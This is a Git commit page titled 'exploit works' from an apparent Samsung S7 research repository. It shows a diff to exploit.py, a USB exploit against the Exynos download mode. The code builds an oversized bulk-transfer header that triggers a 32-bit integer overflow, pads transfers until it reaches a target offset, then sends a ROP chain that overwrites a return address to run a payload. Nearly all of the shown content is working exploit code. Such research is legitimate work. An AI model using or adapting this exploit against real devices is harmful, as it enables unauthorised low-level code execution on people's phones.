EljakimHerrewijnen/Samsung_S7
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

exploit works

Browse Source
This commit is contained in:
Eljakim Herrewijnen 2024-07-15 23:26:23 +02:00
parent 445c52acb4
commit ead9a8a197
1 changed files with 37 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
exploit.py
View File

@ -90,37 +90,60 @@ class ExynosDevice():
def exploit(self, payload: bytes): def exploit(self, payload: bytes):
current_offset = TARGET_OFFSETS[self.target][0] current_offset = TARGET_OFFSETS[self.target][0]
transfered = 0
transferred = ctypes.c_int() transferred = ctypes.c_int()
max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200 size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
max_payload_size = 0x100000000 - size_to_overflow
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
payload = payload + ((max_payload_size - len(payload)) * b"\x00") payload = payload + ((max_payload_size - len(payload)) * b"\x00")
assert len(payload) == max_payload_size, "Invalid payload" assert len(payload) == max_payload_size, "Invalid payload"
# First send payload to trigger the bug # First send payload to trigger the bug
bug_payload = p32(0) + p32(0xfdfde800) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) # dummy packet for triggering the bug bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0, "Error triggering payload" assert res == 0, "Error triggering payload"
current_offset += len(bug_payload) assert transferred.value == len(bug_payload), "Invalid transfered size"
current_offset += len(bug_payload) - 8 # Remove header
# Send the actual payload # Send the actual payload
transfered = 0 # res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) # assert res == 0, "Error sending payload"
assert res == 0, "Error sending payload" # current_offset += len(payload)
current_offset += len(payload) cnt = 0
while True: while True:
if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][2]: if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
break break
self.send_empty_transfer() self.send_empty_transfer()
current_offset += CHUNK_SIZE
cnt += 1
if current_offset > 0x100000000:
current_offset = current_offset - 0x100000000 #reset 32 byte integer
print(f"{cnt} {hex(current_offset)}")
rop_chain = p64(TARGET_OFFSETS[self.target][0]) * (8 // CHUNK_SIZE) remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
if remaining > BLOCK_SIZE:
self.send_empty_transfer()
# Send last transfer, TODO who aligns this ROM??
current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
cnt += 1
print(f"{cnt} {hex(current_offset)}")
rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
# p_offset = (TARGET_OFFSETS[self.target][1] - current_offset)
# rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0]))
# rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32
# Should
transferred = ctypes.c_int(0)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
# assert transferred.value == len(rop_chain), "Error sending ROP chain"
buf = ctypes.c_buffer(b"", 0x200000)
transfered = 0 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
buf = ctypes.c_buffer(b"", 0x20000)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 10000)
padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0] padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0]